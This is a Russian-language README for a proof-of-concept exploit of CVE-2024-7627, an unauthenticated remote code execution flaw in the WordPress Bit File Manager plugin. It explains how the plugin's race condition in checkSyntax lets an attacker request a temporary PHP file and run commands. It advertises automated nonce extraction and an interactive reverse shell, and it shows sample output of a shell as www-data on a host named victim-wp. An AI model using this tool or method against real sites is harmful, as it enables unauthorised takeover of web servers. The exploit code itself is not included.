
Эксплойт для проверки концепции уязвимости CVE-2024-7627, неаутентифицированная уязвимость удаленного выполнения кода в плагине Bit File Manager для WordPress. Автоматизирует извлечение nonce, эксплуатацию состояния гонки и предоставляет интерактивный обратный шелл.
Этот репозиторий содержит эксплойт proof-of-concept (PoC) для CVE-2024-7627, критической уязвимости Неаутентифицированное удаленное выполнение кода (RCE) в плагине WordPress Bit File Manager (версии 6.0 – 6.5.5).
Когда включена функция Guest User Read, плагин создает состояние гонки внутри функции checkSyntax.
Эта функция записывает временный PHP-файл в /wp-content/uploads/ до проверки, что позволяет злоумышленникам запросить этот файл и выполнить произвольные системные команды.
requests, aiohttp, asyncio, beautifulsoup4Установка зависимостей:
pip install requests aiohttp beautifulsoup4
[*] Getting a valid AJAX nonce...
[+] Found the valid AJAX nonce: 65a1d91c63
[*] Getting a random file hash...
[+] Starting interactive shell. Type 'exit' to quit.
lab-shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
lab-shell> uname -a
Linux victim-wp 5.15.0-78-generic #85-Ubuntu SMP x86_64 GNU/Linux
lab-shell> whoami
www-data